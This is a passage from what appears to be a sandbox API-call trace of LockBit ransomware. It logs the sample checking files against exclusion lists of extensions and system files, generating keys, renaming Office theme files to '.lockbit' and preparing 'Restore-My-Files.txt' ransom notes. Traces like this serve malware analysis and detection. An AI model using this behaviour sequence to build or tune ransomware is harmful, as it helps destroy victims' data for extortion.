lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.569] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Austin.xml") returned 1 [0195.570] lstrcmpiW (lpString1="ntldr", lpString2="Austin.xml") returned 1 [0195.570] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Austin.xml") returned 1 [0195.570] lstrcmpiW (lpString1="bootsect.bak", lpString2="Austin.xml") returned 1 [0195.570] lstrcmpiW (lpString1="autorun.inf", lpString2="Austin.xml") returned 1 [0195.570] lstrcmpiW (lpString1="thumbs.db", lpString2="Austin.xml") returned 1 [0195.570] lstrcmpiW (lpString1="iconcache.db", lpString2="Austin.xml") returned 1 [0195.570] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.570] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml") returned=".xml" [0195.570] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.570] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.570] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.571] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.571] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml.lockbit") returned 84 [0195.571] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\austin.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.578] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.578] malloc (_Size=0x40068) returned 0x3d70450 [0195.578] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3606) returned 1 [0195.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0195.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0195.580] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0195.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.601] malloc (_Size=0xbe) returned 0x1fa2ed8 [0195.601] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0195.603] free (_Block=0x1fa2ed8) [0195.603] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.603] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.603] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.603] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ead00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2ead00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xefb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Black Tie.xml", cAlternateFileName="BLACKT~1.XML")) returned 1 [0195.603] lstrcmpiW (lpString1=".", lpString2="Black Tie.xml") returned -1 [0195.603] lstrcmpiW (lpString1="..", lpString2="Black Tie.xml") returned -1 [0195.603] PathFindExtensionW (pszPath="Black Tie.xml") returned=".xml" [0195.603] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.603] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.604] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.605] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Black Tie.xml") returned 1 [0195.606] lstrcmpiW (lpString1="ntldr", lpString2="Black Tie.xml") returned 1 [0195.606] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Black Tie.xml") returned 1 [0195.606] lstrcmpiW (lpString1="bootsect.bak", lpString2="Black Tie.xml") returned 1 [0195.606] lstrcmpiW (lpString1="autorun.inf", lpString2="Black Tie.xml") returned -1 [0195.606] lstrcmpiW (lpString1="thumbs.db", lpString2="Black Tie.xml") returned 1 [0195.606] lstrcmpiW (lpString1="iconcache.db", lpString2="Black Tie.xml") returned 1 [0195.606] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.606] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml") returned=".xml" [0195.606] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.606] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.606] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.607] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.607] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml.lockbit") returned 87 [0195.607] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\black tie.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.609] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.609] malloc (_Size=0x40068) returned 0x3df0008 [0195.609] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3835) returned 1 [0195.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.610] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.617] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.617] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.617] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0195.618] free (_Block=0x1fa2ed8) [0195.618] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.618] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.618] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.618] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedcdc100, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xedcdc100, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Civic.xml", cAlternateFileName="")) returned 1 [0195.618] lstrcmpiW (lpString1=".", lpString2="Civic.xml") returned -1 [0195.618] lstrcmpiW (lpString1="..", lpString2="Civic.xml") returned -1 [0195.619] PathFindExtensionW (pszPath="Civic.xml") returned=".xml" [0195.619] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.619] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.620] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Civic.xml") returned 1 [0195.621] lstrcmpiW (lpString1="ntldr", lpString2="Civic.xml") returned 1 [0195.621] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Civic.xml") returned 1 [0195.621] lstrcmpiW (lpString1="bootsect.bak", lpString2="Civic.xml") returned -1 [0195.621] lstrcmpiW (lpString1="autorun.inf", lpString2="Civic.xml") returned -1 [0195.621] lstrcmpiW (lpString1="thumbs.db", lpString2="Civic.xml") returned 1 [0195.621] lstrcmpiW (lpString1="iconcache.db", lpString2="Civic.xml") returned 1 [0195.621] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.621] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml") returned=".xml" [0195.621] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.621] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.621] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.622] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.622] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml.lockbit") returned 83 [0195.622] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\civic.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.630] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.630] malloc (_Size=0x40068) returned 0x1ff1e60 [0195.631] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3615) returned 1 [0195.631] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.631] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0195.631] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.632] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0195.632] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.634] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.634] malloc (_Size=0xbc) returned 0x1fa2ed8 [0195.635] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0195.636] free (_Block=0x1fa2ed8) [0195.636] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml" | out: pszPath="C:\\\\Program 